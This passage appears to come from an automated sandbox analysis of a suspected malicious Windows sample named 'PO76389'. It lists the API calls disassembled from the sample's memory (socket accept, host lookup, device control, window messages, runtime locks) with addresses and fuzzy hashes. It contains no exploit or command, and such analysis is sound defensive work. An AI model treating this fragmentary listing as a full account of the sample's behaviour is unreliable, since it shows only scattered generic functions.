                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: b4e5503049cb6482570d2f40e43bd725459bd7dcf9816a3545840e0ab7247e49
                                                    • Instruction ID: f9f8f7c89c5270e2594368b0869e04aa3baaee22a6e90a905c17fa54ee6857e2
                                                    • Opcode Fuzzy Hash: b4e5503049cb6482570d2f40e43bd725459bd7dcf9816a3545840e0ab7247e49
                                                    • Instruction Fuzzy Hash: AC11AC35204114BFEB14AB29DC55FFA7BA9BF85324F04851AF816C72A1CBA4AC40CBA4
                                                    APIs
                                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0050906D
                                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0050907F
                                                    • accept.WS2_32(00000000,00000000,00000000), ref: 0050908C
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005090A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: 239ceb63e50b4fc3239afa462fc87b08ef3686e0a8f4e8a59f1a681ee030f163
                                                    • Instruction ID: 56af49334aaf43d597ee49c4ce51e39b8c35acd2df557cc188d1879660e3c6b4
                                                    • Opcode Fuzzy Hash: 239ceb63e50b4fc3239afa462fc87b08ef3686e0a8f4e8a59f1a681ee030f163
                                                    • Instruction Fuzzy Hash: C321AE76A00124AFCB10DF69D894A9EBBFCEF49710F00816AF809D7391DA749A45CBA0
                                                    APIs
                                                      • Part of subcall function 004F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2CB9
                                                      • Part of subcall function 004F2CAA: lstrcpyW.KERNEL32(00000000,?,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F2CDF
                                                      • Part of subcall function 004F2CAA: lstrcmpiW.KERNEL32(00000000,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2D10
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1916
                                                    • lstrcpyW.KERNEL32(00000000,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F193C
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F1970
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 23856ec031ef659ef034798e629030beb70d35c90b94b3579c6d070f504c5b5f
                                                    • Instruction ID: 67ba4d0e54f631777b86f6b9418a8d560087fe1df5b110017cd862ded6156bf9
                                                    • Opcode Fuzzy Hash: 23856ec031ef659ef034798e629030beb70d35c90b94b3579c6d070f504c5b5f
                                                    • Instruction Fuzzy Hash: 6311AC76200309EBDB15AF34D855E7A77B8FF44350B80802BE906CB2A0EBB69855D7E5
                                                    APIs
                                                    • _free.LIBCMT ref: 004E3D65
                                                      • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                      • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                      • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00D50000,00000000,00000001), ref: 004D462F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 62ad7ad45e7a75e1caf495c3d797a257dd3323a9c41749ab2db3d0ed8ffe901d
                                                    • Instruction ID: 65b48b67a3cacf51416199e154b267b1ac81b203f50f594d964c75dd2b3d4e69
                                                    • Opcode Fuzzy Hash: 62ad7ad45e7a75e1caf495c3d797a257dd3323a9c41749ab2db3d0ed8ffe901d
                                                    • Instruction Fuzzy Hash: C511EB31400251ABCB223F73AC18AAA3B98AF50367F10456FF94987391DF7C8E40A659
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004F715C
                                                    • _memset.LIBCMT ref: 004F717D
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004F71CF
                                                    • CloseHandle.KERNEL32(00000000), ref: 004F71D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 604b852263efcd560f162314fcc7ec1ec02584885b9f4df7553184b2829295d4
                                                    • Instruction ID: 7420bbb8f6728824b191d700de9b123ef54f7c25ab6cacbb513f05a822be717c
                                                    • Opcode Fuzzy Hash: 604b852263efcd560f162314fcc7ec1ec02584885b9f4df7553184b2829295d4
                                                    • Instruction Fuzzy Hash: 91110A719012287AD7205BA5AC4DFEBBA7CEF45760F10419AF504E72D0D2744E84CBB8
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004F13EE
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F1409
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F141F
                                                    • FreeLibrary.KERNEL32(?), ref: 004F1474
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                    • String ID:
                                                    • API String ID: 3137044355-0
                                                    • Opcode ID: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                    • Instruction ID: 71c6191db950903b4ec620bf5d2dd126308a042c7d83df4c8b81ff14f05fc131
                                                    • Opcode Fuzzy Hash: 399fabc238d4e90f68bb36fca76e6fa50854789a7d598271f033fac576e55d85
                                                    • Instruction Fuzzy Hash: A0217F7150020DEBDB20DF91DC88AEABBBCEF40744F00846EE61297160D778EA49DF65
                                                    APIs
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                      • Part of subcall function 004CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                    • gethostbyname.WS2_32(?), ref: 005092F0
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005092FB
                                                    • _memmove.LIBCMT ref: 00509328
                                                    • inet_ntoa.WS2_32(?), ref: 00509333
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 9d0605e31c6d6ad4cda3a42dc8742cc9598d14801099eb2f0e86705fb99f9ce7
                                                    • Instruction ID: a59faece4f5e605a2753875de6a7cf022c40db674eefb57e5f80f694b7129681
                                                    • Opcode Fuzzy Hash: 9d0605e31c6d6ad4cda3a42dc8742cc9598d14801099eb2f0e86705fb99f9ce7
                                                    • Instruction Fuzzy Hash: E8118E36500109AFCB04FBA1CD46DEEBBB9FF14318710406AF506A72A2DB34AE04DB65
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004EC285
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC297
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2AD
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004EC2C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                    • Instruction ID: d3b6395981a2f614710b440294e834208fc8073083d15eb34edee93d232ed532
                                                    • Opcode Fuzzy Hash: ac441190c375cc07da697712b259b3547b0bae34a546541c145c466405044aa8
                                                    • Instruction Fuzzy Hash: 4411187AD40218FFDB11DBD9C885E9DBBB4FB08710F204092EA04B7294D671AE11DB94
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 004F7C6C
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 004F7C9F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004F7CB5
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004F7CBC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                    • Instruction ID: e04abbc7c7f44d343d93c8b2f07fc1e7ddf560cdfcb31460806d0385503c805c
                                                    • Opcode Fuzzy Hash: 0f372d3132ddc7e04067841f6915d2ffc3dbb33706bbef159c237c0f30e9e8e2
                                                    • Instruction Fuzzy Hash: DF110872A04258AFCB019F68EC08AAB7FBE9B14324F144216FA25D3351D6748948B775
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
                                                    • GetStockObject.GDI32(00000011), ref: 004CC66B
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CC675
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                    • Instruction ID: 46e0c5cc657d6d16e6f2eff965f88d8023adf824be1cbf5ba2622168bc466b34
                                                    • Opcode Fuzzy Hash: a2ab15fd248159615988e6b8988e610934733bcc58b359df48c8d03901454aa4
                                                    • Instruction Fuzzy Hash: 6F11A172601549BFDB114FA0AD85FEABB79FF19354F050116FA1852210C736DC60EBA5
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F49EE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A13
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A1D
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,004F354D,?,004F45D5,?,00008000), ref: 004F4A50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                    • Instruction ID: 33c9f45d393563e6f2b8addac5a5c023e277a56ab5cda7d801e2a086e439c18c
                                                    • Opcode Fuzzy Hash: abed6c6a8664b16146799566f794e058d143bf10bbc649c3d9d52fb4f1959c96
                                                    • Instruction Fuzzy Hash: CC115A31D4051CDBCF00EFA5EA49AEFBB74FF59701F000046EA41B2250DB389654DBA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction ID: 9d5867dca2cb170ba1fdd45c0db641da04ac2a95cbef32f946fbe73becb18368
                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                    • Instruction Fuzzy Hash: C701833200068EBBCF125F86DC51CEE3F22BB18359F558816FE1859131C23AD9B2AB85
                                                    APIs
                                                      • Part of subcall function 004D869D: __getptd_noexit.LIBCMT ref: 004D869E
                                                    • __lock.LIBCMT ref: 004D811F
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004D813C
                                                    • _free.LIBCMT ref: 004D814F
                                                    • InterlockedIncrement.KERNEL32(00D62A98), ref: 004D8167
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 2704283638-0
                                                    • Opcode ID: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                    • Instruction ID: 7bb0fa705819ce1450a1a960bc1c0d4d24c11a06f4ca905ed6afcb25e74746ba
                                                    • Opcode Fuzzy Hash: 91ab35c347e6b935cd427af6733cd18290f0f607b82fd4edaa50a24341e8de27
                                                    • Instruction Fuzzy Hash: DF0161319016119BCB11AB69982A7BE77B0BF04714F04055FF81467391DF6C6C4ADFDA
                                                    APIs
                                                    • __lock.LIBCMT ref: 004D8768
                                                      • Part of subcall function 004D8984: __mtinitlocknum.LIBCMT ref: 004D8996
                                                      • Part of subcall function 004D8984: RtlEnterCriticalSection.NTDLL(004D0127), ref: 004D89AF
                                                    • InterlockedIncrement.KERNEL32(DC840F00), ref: 004D8775
                                                    • __lock.LIBCMT ref: 004D8789
                                                    • ___addlocaleref.LIBCMT ref: 004D87A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1687444384-0
                                                    • Opcode ID: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                    • Instruction ID: 598087e672e9286ecc6257aa7b4fd0894fe1ffc91ebba3253e6b131da27bf4d8
                                                    • Opcode Fuzzy Hash: b9d4b1eb2f69f098c4d39b9e5f88f56c0d4b58bd5ebb9101249506deb799a786
                                                    • Instruction Fuzzy Hash: BF015B71401B009ED760AF66D81675ABBF0BF54329F20890FE499973A0DBB8A644CF05
                                                    APIs
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 004F9C7F
                                                      • Part of subcall function 004FAD14: _memset.LIBCMT ref: 004FAD49
                                                    • _memmove.LIBCMT ref: 004F9CA2
                                                    • _memset.LIBCMT ref: 004F9CAF
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 004F9CBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
